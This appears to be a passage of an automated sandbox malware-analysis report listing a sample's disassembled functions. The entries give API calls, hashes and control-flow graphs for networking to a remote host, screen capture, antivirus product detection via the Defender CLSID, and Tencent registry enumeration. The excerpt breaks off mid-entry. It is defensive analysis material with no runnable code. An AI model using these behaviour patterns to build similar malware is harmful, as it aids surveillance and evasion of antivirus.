573 2d0a09a 571->573 573->568
                                                                                                  APIs
                                                                                                  • GdipGetImagePixelFormat.GDIPLUS(Function_00009A30,?,?,00000000), ref: 02D09E7B
                                                                                                  • GdipGetImageHeight.GDIPLUS(Function_00009A30,?,?,00000000), ref: 02D09EFC
                                                                                                  • GdipGetImageWidth.GDIPLUS(Function_00009A30,?,?,00000000), ref: 02D09F24
                                                                                                  • GdipGetImagePaletteSize.GDIPLUS(Function_00009A30,?,?,00000000), ref: 02D09F7F
                                                                                                  • _malloc.LIBCMT ref: 02D09FC0
                                                                                                    • Part of subcall function 02D0F673: __FF_MSGBANNER.LIBCMT ref: 02D0F68C
                                                                                                    • Part of subcall function 02D0F673: __NMSG_WRITE.LIBCMT ref: 02D0F693
                                                                                                    • Part of subcall function 02D0F673: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,02D14500,00000000,00000001,00000000,?,02D18DE6,00000018,02D26448,0000000C,02D18E76), ref: 02D0F6B8
                                                                                                  • _free.LIBCMT ref: 02D0A000
                                                                                                  • GdipGetImagePalette.GDIPLUS(?,00000008,?,?,00000000), ref: 02D0A028
                                                                                                  • SetDIBColorTable.GDI32(?,00000000,?,?,?,00000000), ref: 02D0A0B7
                                                                                                  • GdipBitmapLockBits.GDIPLUS(Function_00009A30,?,00000001,?,?,?,00000000), ref: 02D0A112
                                                                                                  • _free.LIBCMT ref: 02D0A134
                                                                                                  • _memcpy_s.LIBCMT ref: 02D0A183
                                                                                                  • GdipBitmapUnlockBits.GDIPLUS(?,?,?,00000000), ref: 02D0A1D0
                                                                                                  • GdipCreateBitmapFromScan0.GDIPLUS(?,?,02D25A78,00022009,?,00000000,?,00000000), ref: 02D0A22C
                                                                                                  • GdipGetImageGraphicsContext.GDIPLUS(00000000,00022009,?,00000000), ref: 02D0A24C
                                                                                                  • GdipDrawImageI.GDIPLUS(00000000,Function_00009A30,00000000,00000000,?,00000000), ref: 02D0A267
                                                                                                  • GdipDeleteGraphics.GDIPLUS(?,?,00000000), ref: 02D0A274
                                                                                                  • GdipDisposeImage.GDIPLUS(00000000,?,00000000), ref: 02D0A27B
                                                                                                  • _free.LIBCMT ref: 02D0A296
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Gdip$Image$Bitmap_free$BitsGraphicsPalette$AllocateColorContextCreateDeleteDisposeDrawFormatFromHeapHeightLockPixelScan0SizeTableUnlockWidth_malloc_memcpy_s
                                                                                                  • String ID: &
                                                                                                  • API String ID: 640422297-3042966939
                                                                                                  • Opcode ID: f32f4d2edbb0cefa07f80064f9c806d76c11c4a47ed342e83a9fdccfc24f6026
                                                                                                  • Instruction ID: 0c569d63d4f23d167e51da4a9821e5dbe9873c8cc101842c91a49375ea432900
                                                                                                  • Opcode Fuzzy Hash: f32f4d2edbb0cefa07f80064f9c806d76c11c4a47ed342e83a9fdccfc24f6026
                                                                                                  • Instruction Fuzzy Hash: 75D16EB1A002199BCB20CF65CCD4B9AB7B5EF48304F1085ADE709A7391D774AE85CF69
                                                                                                  Function 02D02DA0 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 203networkstringtimeCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • ResetEvent.KERNEL32(?), ref: 02D02DBB
                                                                                                  • InterlockedExchange.KERNEL32(?,00000000), ref: 02D02DC7
                                                                                                  • timeGetTime.WINMM ref: 02D02DCD
                                                                                                  • socket.WS2_32(00000002,00000001,00000006), ref: 02D02DFA
                                                                                                  • lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 02D02E26
                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 02D02E32
                                                                                                  • lstrlenW.KERNEL32(?,00000000,000000CA,00000000,00000000), ref: 02D02E51
                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 02D02E5D
                                                                                                  • gethostbyname.WS2_32(00000000), ref: 02D02E6B
                                                                                                  • htons.WS2_32(?), ref: 02D02E8D
                                                                                                  • connect.WS2_32(?,?,00000010), ref: 02D02EAB
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharMultiWidelstrlen$EventExchangeInterlockedResetTimeconnectgethostbynamehtonssockettime
                                                                                                  • String ID: 0u
                                                                                                  • API String ID: 640718063-3203441087
                                                                                                  • Opcode ID: 73e4e80d04e486b3b109227398024c88c2e0193a568d43e3b81bae788261b85e
                                                                                                  • Instruction ID: 60590654028af223654d94560a0aa72e6c58f4175a8dd0beac6c5f7f150eacb5
                                                                                                  • Opcode Fuzzy Hash: 73e4e80d04e486b3b109227398024c88c2e0193a568d43e3b81bae788261b85e
                                                                                                  • Instruction Fuzzy Hash: D4614F71A80304AFE720DFA5DC89FAAB7B9FF58710F104519FA55A73D0D7B0A9048B64
                                                                                                  Function 00972D80 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 203networkstringtimeCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • ResetEvent.KERNEL32(?), ref: 00972D9B
                                                                                                  • InterlockedExchange.KERNEL32(?,00000000), ref: 00972DA7
                                                                                                  • timeGetTime.WINMM ref: 00972DAD
                                                                                                  • socket.WS2_32(00000002,00000001,00000006), ref: 00972DDA
                                                                                                  • lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 00972E06
                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 00972E12
                                                                                                  • lstrlenW.KERNEL32(?,00000000,000000CA,00000000,00000000), ref: 00972E31
                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 00972E3D
                                                                                                  • gethostbyname.WS2_32(00000000), ref: 00972E4B
                                                                                                  • htons.WS2_32(?), ref: 00972E6D
                                                                                                  • connect.WS2_32(?,?,00000010), ref: 00972E8B
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharMultiWidelstrlen$EventExchangeInterlockedResetTimeconnectgethostbynamehtonssockettime
                                                                                                  • String ID: 0u
                                                                                                  • API String ID: 640718063-3203441087
                                                                                                  • Opcode ID: 7a966cc15e6d329a3fc326de93d7a61fd9999d15a4b04264b2fe44a84e2cb4cf
                                                                                                  • Instruction ID: 73e22a08293e1571bf72917727ce22165728e4eb42a0ad6ec497794cd44ddea2
                                                                                                  • Opcode Fuzzy Hash: 7a966cc15e6d329a3fc326de93d7a61fd9999d15a4b04264b2fe44a84e2cb4cf
                                                                                                  • Instruction Fuzzy Hash: EA6152B1A54704AFD720DFA4DC45FAAB7B8FF48710F104519F64AA72D0D7B0A9048B65
                                                                                                  Function 02D0AD10 Relevance: 28.3, APIs: 12, Strings: 4, Instructions: 346registryCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 656 2d0ad10-2d0ad2b 657 2d0ad84-2d0ad8f 656->657 658 2d0ad2d-2d0ad5b RegOpenKeyExW 656->658 661 2d0b845-2d0b84b call 2d0ce00 657->661 662 2d0ad95-2d0ad9c 657->662 659 2d0ad79-2d0ad7e 658->659 660 2d0ad5d-2d0ad73 RegQueryValueExW 658->660 659->657 663 2d0b84e-2d0b854 659->663 660->659 661->663 664 2d0afe3-2d0b09b call 2d0f707 call 2d16770 call 2d0eff4 call 2d17660 call 2d0f707 call 2d0cf20 call 2d0eff4 662->664 665 2d0adea-2d0adf1 662->665 714 2d0b0a1-2d0b0ee call 2d17660 RegCreateKeyW 664->714 715 2d0b162-2d0b189 call 2d0fa29 CloseHandle 664->715 665->663 668 2d0adf7-2d0ae29 call 2d0f707 call 2d16770 665->668 679 2d0ae42-2d0ae4e 668->679 680 2d0ae2b-2d0ae3f wsprintfW 668->680 682 2d0ae50 679->682 683 2d0ae9a-2d0aef1 call 2d0eff4 call 2d17660 call 2d02ba0 call 2d0efff * 2 679->683 680->679 686 2d0ae54-2d0ae5f 682->686 689 2d0ae60-2d0ae66 686->689 690 2d0ae86-2d0ae88 689->690 691 2d0ae68-2d0ae6b 689->691 696 2d0ae8b-2d0ae8d 690->696 694 2d0ae82-2d0ae84 691->694 695 2d0ae6d-2d0ae75 691->695 694->696 695->690 699 2d0ae77-2d0ae80 695->699 700 2d0aef4-2d0af09 696->700 701 2d0ae8f-2d0ae98 696->701 699->689 699->694 704 2d0af10-2d0af16 700->704 701->683 701->686 707 2d0af36-2d0af38 704->707 708 2d0af18-2d0af1b 704->708 713 2d0af3b-2d0af3d 707->713 711 2d0af32-2d0af34 708->711 712 2d0af1d-2d0af25 708->712 711->713 712->707 718 2d0af27-2d0af30 712->718 719 2d0afae-2d0afe0 call 2d0fa29 CloseHandle call 2d0efff 713->719 720 2d0af3f-2d0af41 713->720 729 2d0b0f0-2d0b13f call 2d0eff4 call 2d05a30 RegDeleteValueW RegSetValueExW 714->729 730 2d0b14a-2d0b15f RegCloseKey call 2d0fac9 714->730 718->704 718->711 725 2d0af43-2d0af4e call 2d0efff 720->725 726 2d0af55-2d0af5c 720->726 725->726 733 2d0af70-2d0af74 726->733 734 2d0af5e-2d0af69 call 2d0fac9 726->734 729->730 752 2d0b141-2d0b147 call 2d0fac9 729->752 730->715 737 2d0af85-2d0afa9 call 2d0f020 733->737 738 2d0af76-2d0af7f call 2d0efff 733->738 734->733 737->683 738->737 752->730
                                                                                                  APIs
                                                                                                  • RegOpenKeyExW.KERNELBASE(80000001,Console,00000000,00020019,?), ref: 02D0AD53
                                                                                                  • RegQueryValueExW.KERNEL32(?,IpDatespecial,00000000,?,00000000,?), ref: 02D0AD73
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: OpenQueryValue
                                                                                                  • String ID: %s_bin$Console$Console\0$IpDatespecial
                                                                                                  • API String ID: 4153817207-1338088003
                                                                                                  • Opcode ID: ab26514982d552870e9b46a14721117b3fa89382e2c7cbca0e63feca12a76726
                                                                                                  • Instruction ID: 3ff75db70abd071ebe4484da594a1f75d6baac17e503c3bb45d22964e544b939
                                                                                                  • Opcode Fuzzy Hash: ab26514982d552870e9b46a14721117b3fa89382e2c7cbca0e63feca12a76726
                                                                                                  • Instruction Fuzzy Hash: DDC1BFB2A403019BE314DF24DC85F6BB7A9EF94714F140528FA499B3E1E771ED14CAA2
                                                                                                  Function 02D06150 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 222stringcomregistryCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 755 2d06150-2d061a5 call 2d16770 call 2d1004b 760 2d06201-2d06228 CoCreateInstance 755->760 761 2d061a7-2d061ae 755->761 763 2d06422-2d0642f lstrlenW 760->763 764 2d0622e-2d06282 760->764 762 2d061b0-2d061b2 call 2d06050 761->762 768 2d061b7-2d061b9 762->768 766 2d06441-2d06450 763->766 767 2d06431-2d0643b lstrcatW 763->767 775 2d06288-2d062a2 764->775 776 2d0640a-2d06418 764->776 769 2d06452-2d06457 766->769 770 2d0645a-2d0647a call 2d0f00a 766->770 767->766 772 2d061db-2d061ff call 2d1004b 768->772 773 2d061bb-2d061d9 lstrcatW * 2 768->773 769->770 772->760 772->762 773->772 775->776 782 2d062a8-2d062b4 775->782 776->763 777 2d0641a-2d0641f 776->777 777->763 783 2d062c0-2d06363 call 2d16770 wsprintfW RegOpenKeyExW 782->783 786 2d063e9-2d063ff 783->786 787 2d06369-2d063ba call 2d16770 RegQueryValueExW 783->787 789 2d06402-2d06404 786->789 791 2d063dc-2d063e3 RegCloseKey 787->791 792 2d063bc-2d063da lstrcatW * 2 787->792 789->776 789->783 791->786 792->791
                                                                                                  APIs
                                                                                                  • _memset.LIBCMT ref: 02D0618B
                                                                                                  • lstrcatW.KERNEL32(02D31F10,02D2510C,?,7A8163DF,00000AD4,00000000,753C73E0), ref: 02D061CD
                                                                                                  • lstrcatW.KERNEL32(02D31F10,02D2535C,?,7A8163DF,00000AD4,00000000,753C73E0), ref: 02D061D9
                                                                                                  • CoCreateInstance.OLE32(02D22480,00000000,00000017,02D2578C,?,?,7A8163DF,00000AD4,00000000,753C73E0), ref: 02D06220
                                                                                                  • _memset.LIBCMT ref: 02D062CE
                                                                                                  • wsprintfW.USER32 ref: 02D06336
                                                                                                  • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,?), ref: 02D0635F
                                                                                                  • _memset.LIBCMT ref: 02D06376
                                                                                                    • Part of subcall function 02D06050: _memset.LIBCMT ref: 02D0607C
                                                                                                    • Part of subcall function 02D06050: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00000000), ref: 02D06088
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memset$Createlstrcat$InstanceOpenSnapshotToolhelp32wsprintf
                                                                                                  • String ID: CLSID\{%.8X-%.4X-%.4X-%.2X%.2X-%.2X%.2X%.2X%.2X%.2X%.2X}$Windows Defender IOfficeAntiVirus implementation
                                                                                                  • API String ID: 1221949200-1583895642
                                                                                                  • Opcode ID: 21d57de5615bcc828a130aa29c89abcfed1e0d33e6e8263904a9bd0dbde518c2
                                                                                                  • Instruction ID: 64e8382d399a0c7586585fe9c7e9ea64b1f00cddd6fd225521d618d8f538e06d
                                                                                                  • Opcode Fuzzy Hash: 21d57de5615bcc828a130aa29c89abcfed1e0d33e6e8263904a9bd0dbde518c2
                                                                                                  • Instruction Fuzzy Hash: 2B8195B1A40228AFEB20DB54DC84FAEB77CEB48704F544588F609A7391D774AE44CFA4
                                                                                                  Function 02D05F40 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 88sleepstringsynchronizationCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • CreateMutexW.KERNEL32(00000000,00000000,2024.12.28), ref: 02D05F66
                                                                                                  • GetLastError.KERNEL32 ref: 02D05F6E
                                                                                                  • Sleep.KERNEL32(000003E8), ref: 02D05F85
                                                                                                  • CreateMutexW.KERNEL32(00000000,00000000,2024.12.28), ref: 02D05F90
                                                                                                  • GetLastError.KERNEL32 ref: 02D05F92
                                                                                                  • _memset.LIBCMT ref: 02D05FB9
                                                                                                  • lstrlenW.KERNEL32(?), ref: 02D05FC6
                                                                                                  • lstrcmpW.KERNEL32(?,02D25328), ref: 02D05FED
                                                                                                  • Sleep.KERNEL32(000003E8), ref: 02D05FF8
                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 02D06005
                                                                                                  • GetConsoleWindow.KERNEL32 ref: 02D0600F
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CreateErrorLastMutexSleep$ConsoleHandleModuleWindow_memsetlstrcmplstrlen
                                                                                                  • String ID: 2024.12.28$key$open
                                                                                                  • API String ID: 2922109467-4166660675
                                                                                                  • Opcode ID: 38f7cba42e05279908dc2ed0035fc8fe6ee97fe2308886be90f65f32915279bc
                                                                                                  • Instruction ID: 5dd67a2480c23f52c012516a500ce55620aeeb741ccbc0161c12cc65246ae8e5
                                                                                                  • Opcode Fuzzy Hash: 38f7cba42e05279908dc2ed0035fc8fe6ee97fe2308886be90f65f32915279bc
                                                                                                  • Instruction Fuzzy Hash: 0121C1729843019AE724DB60EC89F5A7398EBA4704F614C19FA04973D0DBB0ED1DCBA3
                                                                                                  Function 02D062B6 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 125stringregistryCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 814 2d062b6-2d062bd 815 2d062c0-2d06363 call 2d16770 wsprintfW RegOpenKeyExW 814->815 818 2d063e9-2d063ff 815->818 819 2d06369-2d06376 call 2d16770 815->819 821 2d06402-2d06404 818->821 822 2d0637b-2d063ba RegQueryValueExW 819->822 821->815 823 2d0640a-2d06418 821->823 824 2d063dc-2d063e3 RegCloseKey 822->824 825 2d063bc-2d063da lstrcatW * 2 822->825 826 2d06422-2d0642f lstrlenW 823->826 827 2d0641a-2d0641f 823->827 824->818 825->824 828 2d06441-2d06450 826->828 829 2d06431-2d0643b lstrcatW 826->829 827->826 830 2d06452-2d06457 828->830 831 2d0645a-2d0647a call 2d0f00a 828->831 829->828 830->831
                                                                                                  APIs
                                                                                                  • _memset.LIBCMT ref: 02D062CE
                                                                                                  • wsprintfW.USER32 ref: 02D06336
                                                                                                  • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,?), ref: 02D0635F
                                                                                                  • _memset.LIBCMT ref: 02D06376
                                                                                                  • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,?,?,?), ref: 02D063B2
                                                                                                  • lstrcatW.KERNEL32(02D31F10,?), ref: 02D063CE
                                                                                                  • lstrcatW.KERNEL32(02D31F10,02D2535C), ref: 02D063DA
                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 02D063E3
                                                                                                  • lstrlenW.KERNEL32(02D31F10,?,7A8163DF,00000AD4,00000000,753C73E0), ref: 02D06427
                                                                                                  • lstrcatW.KERNEL32(02D31F10,02D253D4,?,7A8163DF,00000AD4,00000000,753C73E0), ref: 02D0643B
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: lstrcat$_memset$CloseOpenQueryValuelstrlenwsprintf
                                                                                                  • String ID: CLSID\{%.8X-%.4X-%.4X-%.2X%.2X-%.2X%.2X%.2X%.2X%.2X%.2X}$Windows Defender IOfficeAntiVirus implementation
                                                                                                  • API String ID: 1671694837-1583895642
                                                                                                  • Opcode ID: a0992da8ac36e60a1de0d6babb03f8c25d275cd66f90224f399183872b2a006a
                                                                                                  • Instruction ID: 76c3397a1211af36371342ebc68ccf3ebafeda8c4c1d8ebb6e01148874f45bf3
                                                                                                  • Opcode Fuzzy Hash: a0992da8ac36e60a1de0d6babb03f8c25d275cd66f90224f399183872b2a006a
                                                                                                  • Instruction Fuzzy Hash: B54191B1A00228ABDB34DB50DC94FAAB7B8AF48705F4441C8F349A6291D6749E84CFA4
                                                                                                  Function 02D0C060 Relevance: 19.7, APIs: 13, Instructions: 179memoryCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • GlobalAlloc.KERNEL32(00000002,?,7A8163DF,?,00000000,?), ref: 02D0C09E
                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 02D0C0AA
                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 02D0C0BF
                                                                                                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 02D0C0D5
                                                                                                  • EnterCriticalSection.KERNEL32(02D2FB64), ref: 02D0C113
                                                                                                  • LeaveCriticalSection.KERNEL32(02D2FB64), ref: 02D0C124
                                                                                                    • Part of subcall function 02D09DE0: GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 02D09E04
                                                                                                    • Part of subcall function 02D09DE0: GdipDisposeImage.GDIPLUS(?), ref: 02D09E18
                                                                                                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 02D0C14C
                                                                                                    • Part of subcall function 02D0A460: GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 02D0A48D
                                                                                                    • Part of subcall function 02D0A460: _free.LIBCMT ref: 02D0A503
                                                                                                  • GetHGlobalFromStream.OLE32(?,?), ref: 02D0C16D
                                                                                                  • GlobalLock.KERNEL32(?), ref: 02D0C177
                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 02D0C18F
                                                                                                    • Part of subcall function 02D09BA0: DeleteObject.GDI32(?), ref: 02D09BD2
                                                                                                    • Part of subcall function 02D09BA0: EnterCriticalSection.KERNEL32(02D2FB64,?,?,?,02D09B7B), ref: 02D09BE3
                                                                                                    • Part of subcall function 02D09BA0: EnterCriticalSection.KERNEL32(02D2FB64,?,?,?,02D09B7B), ref: 02D09BF8
                                                                                                    • Part of subcall function 02D09BA0: GdiplusShutdown.GDIPLUS(00000000,?,?,?,02D09B7B), ref: 02D09C04
                                                                                                    • Part of subcall function 02D09BA0: LeaveCriticalSection.KERNEL32(02D2FB64,?,?,?,02D09B7B), ref: 02D09C15
                                                                                                    • Part of subcall function 02D09BA0: LeaveCriticalSection.KERNEL32(02D2FB64,?,?,?,02D09B7B), ref: 02D09C1C
                                                                                                  • GlobalSize.KERNEL32(00000000), ref: 02D0C1A5
                                                                                                  • GlobalUnlock.KERNEL32(?), ref: 02D0C221
                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 02D0C249
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Global$CriticalSection$Stream$CreateEnterGdipLeave$FreeFromImageLockSizeUnlock$AllocBitmapDeleteDisposeEncodersGdiplusObjectShutdown_free
                                                                                                  • String ID:
                                                                                                  • API String ID: 1483550337-0
                                                                                                  • Opcode ID: 4d9d97595a1ea4beb670c3c962e5ee738e06a5b3ae467e1c5bdcb58332ed2776
                                                                                                  • Instruction ID: d5e45d026c0a44c060b1cfcaa3c71baabd58dd2f9b8ce40adb35e887fcc8235f
                                                                                                  • Opcode Fuzzy Hash: 4d9d97595a1ea4beb670c3c962e5ee738e06a5b3ae467e1c5bdcb58332ed2776
                                                                                                  • Instruction Fuzzy Hash: AA613AB1D00218AFDB10EFA5D888A9EBBB9FF58710F10852AF915A7351DB319D05CF60
                                                                                                  Function 02D06490 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 144registrystringCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • _memset.LIBCMT ref: 02D064C2
                                                                                                  • RegOpenKeyExW.KERNEL32(80000001,Software\Tencent\Plugin\VAS,00000000,000F003F,?), ref: 02D064E2
                                                                                                  • RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,?,?,00000000,?,?,?,00000000,00000000), ref: 02D06524
                                                                                                  • _memset.LIBCMT ref: 02D06560
                                                                                                  • _memset.LIBCMT ref: 02D0658E
                                                                                                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00000000,00000AD4,753C73E0), ref: 02D065BA
                                                                                                  • lstrlenW.KERNEL32(?,?,?,?,00000000,00000AD4,753C73E0), ref: 02D065C3
                                                                                                  • lstrlenW.KERNEL32(?,?,?,?,00000000,00000AD4,753C73E0), ref: 02D065D5
                                                                                                  • RegCloseKey.ADVAPI32(?,00000000,00000AD4,753C73E0), ref: 02D06625
                                                                                                  • lstrlenW.KERNEL32(?), ref: 02D06635
                                                                                                  Strings
                                                                                                  • Software\Tencent\Plugin\VAS, xrefs: 02D064D8
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memsetlstrlen$CloseEnumInfoOpenQuery
                                                                                                  • String ID: Software\Tencent\Plugin\VAS
                                                                                                  • API String ID: 2921034913-3343197220
                                                                                                  • Opcode ID: e6a84a911fc342b010a17bf2671363eb7ed897dc2eb6050b1f95423f9fafd7b1
                                                                                                  • Instruction ID: 77c0ddda69fbf4725f10c870e329e94d0f0f095c1e7eb7c34ca8417e619ab7fd
                                                                                                  • Opcode Fuzzy Hash: e6a84a911fc342b010a17bf2671363eb7ed897dc2eb6050b1f95423f9fafd7b1
                                                                                                  • Instruction Fuzzy Hash: 5E41D4F1A40218AAD734DB90CD85FEA737DEB44700F5044D9E709B7281EA70AE95CFA4
                                                                                                  Function 02D0A460 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 150windowCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 02D0A48D
                                                                                                  • _malloc.LIBCMT ref: 02D0A4D1
                                                                                                  • _free.LIBCMT ref: 02D0A503
                                                                                                  • GdipGetImageEncoders.GDIPLUS(?,?,00000008), ref: 02D0A522
                                                                                                  • GdipSaveImageToStream.GDIPLUS(00000000,?,?,00000000), ref: 02D0A594
                                                                                                  • GdipDisposeImage.GDIPLUS(00000000), ref: 02D0A59F
                                                                                                  • GdipCreateBitmapFromHBITMAP.GDIPLUS(?,00000000,?), ref: 02D0A5C5
                                                                                                  • GdipDisposeImage.GDIPLUS(00000000), ref: 02D0A5DD
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Gdip$Image$DisposeEncoders$BitmapCreateFromSaveSizeStream_free_malloc
                                                                                                  • String ID: &
                                                                                                  • API String ID: 2794124522-3042966939
                                                                                                  • Opcode ID: 7116c6567c25c093ed8706b1220974367d1102e1a5f63289df9d5aacd6d02f60
                                                                                                  • Instruction ID: 114a837aaceac069865d331e380894d159af844d6bdf16bdcd022931e77572ab
